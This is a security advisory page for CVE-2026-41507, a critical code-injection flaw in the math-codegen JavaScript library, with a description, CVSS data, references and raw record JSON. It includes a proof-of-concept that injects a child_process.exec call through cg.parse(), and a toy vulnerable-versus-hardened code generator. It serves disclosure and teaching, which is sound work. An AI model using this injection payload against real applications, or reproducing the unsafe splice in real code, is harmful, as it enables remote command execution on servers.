Security Vulnerability Report
CVE-2026-41507 CVSS 9.8 CRITICAL

CVE-2026-41507

Published: 2026-05-08 14:16:34
Last Modified: 2026-05-08 16:02:14

Description

math-codegen generates code from mathematical expressions. Prior to version 0.4.3, string literal content passed to cg.parse() is injected verbatim into a new Function() body without sanitization. This allows an attacker to execute arbitrary system commands when user-controlled input reaches the parser. Any application exposing a math evaluation endpoint where user input flows into cg.parse() is vulnerable to full RCE. This issue has been patched in version 0.4.3.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available in the record.

Affected product: math-codegen < 0.4.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```javascript
// PoC for CVE-2026-41507
// Demonstrates arbitrary code execution via unsanitized input in cg.parse()
// Usage: node poc.js

const cg = require('math-codegen'); // Vulnerable version < 0.4.3

// The vulnerability allows injecting arbitrary code into the new Function() body.
// By breaking out of the expected mathematical expression context,
// we can execute Node.js child processes.

// Payload example: Execute 'id' command on Linux/Mac or 'whoami' on Windows
// The input is treated as a string literal inside the generated function.
// We close the string/operation and inject a malicious statement.
var maliciousPayload = "1); process.mainModule.require('child_process').exec('echo VULNERABLE > pwned.txt'); //";

console.log("[*] Attempting to exploit CVE-2026-41507...");

try {
  // The vulnerable library passes the payload directly to new Function()
  // resulting in execution similar to: new Function('return ' + payload)()
  var result = cg.parse(maliciousPayload);
  console.log("[+] Payload sent to cg.parse(). Check if file 'pwned.txt' was created.");
} catch (e) {
  console.log("[-] Error during execution (may be due to syntax or environment):", e.message);
}
```
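The defect class behind the description and the PoC above, shown as an added example that is not math-codegen's code and not the PoC: a toy expression compiler with the vulnerable verbatim splice of a string literal into a new Function() body beside the hardened form that escapes the literal with JSON.stringify. The grammar is reduced to a single call name('literal'); parseCall, compileUnsafe, compileSafe, demo and the ns namespace object are hypothetical names.

```javascript
// Added example for CVE-2026-41507 (CWE-94); NOT math-codegen's code.
// A toy generator compiles a one-call expression such as length('hello')
// into a function over a namespace object `ns` via new Function().
// parseCall, compileUnsafe, compileSafe and demo are hypothetical names.

// Parse `name('literal')`; returns { name, literal } or throws.
function parseCall(expr) {
  const m = /^(\w+)\('(.*)'\)$/s.exec(expr);
  if (!m) throw new Error('unsupported expression: ' + expr);
  return { name: m[1], literal: m[2] };
}

// Vulnerable pattern: the literal is spliced verbatim into the source handed
// to new Function(), so a quote inside it terminates the literal and the
// rest of the input becomes code (the defect described for < 0.4.3).
function compileUnsafe(expr) {
  const { name, literal } = parseCall(expr);
  const body = "var r = ns." + name + "('" + literal + "'); return r;";
  return new Function('ns', body);
}

// Hardened pattern: JSON.stringify emits an escaped JS string literal
// (quotes, backslashes, control characters), so the input stays data.
function compileSafe(expr) {
  const { name, literal } = parseCall(expr);
  const body = "var r = ns." + name + "(" + JSON.stringify(literal) + "); return r;";
  return new Function('ns', body);
}

// Constructed input: closes the literal and the call, runs one extra
// statement (here only setting a flag on ns), then reopens a literal.
const PAYLOAD = "'); ns.hit = true; ('";
const EXPR = "length('" + PAYLOAD + "')";

// Runs both generators on EXPR; reports whether the injected statement ran
// and what each compiled function returned.
function demo() {
  const unsafeNs = { length: (s) => s.length };
  const safeNs = { length: (s) => s.length };
  const unsafeVal = compileUnsafe(EXPR)(unsafeNs);
  const safeVal = compileSafe(EXPR)(safeNs);
  return {
    unsafeEscaped: unsafeNs.hit === true, unsafeVal,
    safeEscaped: safeNs.hit === true, safeVal,
  };
}

console.log(demo()); // unsafeEscaped: true, unsafeVal: 0, safeEscaped: false, safeVal: 21
```

Under the hardened generator the whole 21-character input is passed to ns.length as one string, and the flag on ns is never set.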

References

https://github.com/mauriciopoppe/math-codegen/commit/4bb52d3030683362b3559ee8dd91350555a05f6b
https://github.com/mauriciopoppe/math-codegen/pull/11
https://github.com/mauriciopoppe/math-codegen/security/advisories/GHSA-p6x5-p4xf-cc4r

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-41507",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-08T14:16:34.133",
    "lastModified": "2026-05-08T16:02:14.343",
    "vulnStatus": "Undergoing Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "math-codegen generates code from mathematical expressions. Prior to version 0.4.3, string literal content passed to cg.parse() is injected verbatim into a new Function() body without sanitization. This allows an attacker to execute arbitrary system commands when user-controlled input reaches the parser. Any application exposing a math evaluation endpoint where user input flows into cg.parse() is vulnerable to full RCE. This issue has been patched in version 0.4.3."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-94"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/mauriciopoppe/math-codegen/commit/4bb52d3030683362b3559ee8dd91350555a05f6b",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/mauriciopoppe/math-codegen/pull/11",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/mauriciopoppe/math-codegen/security/advisories/GHSA-p6x5-p4xf-cc4r",
        "source": "[email protected]"
      }
    ]
  }
}
```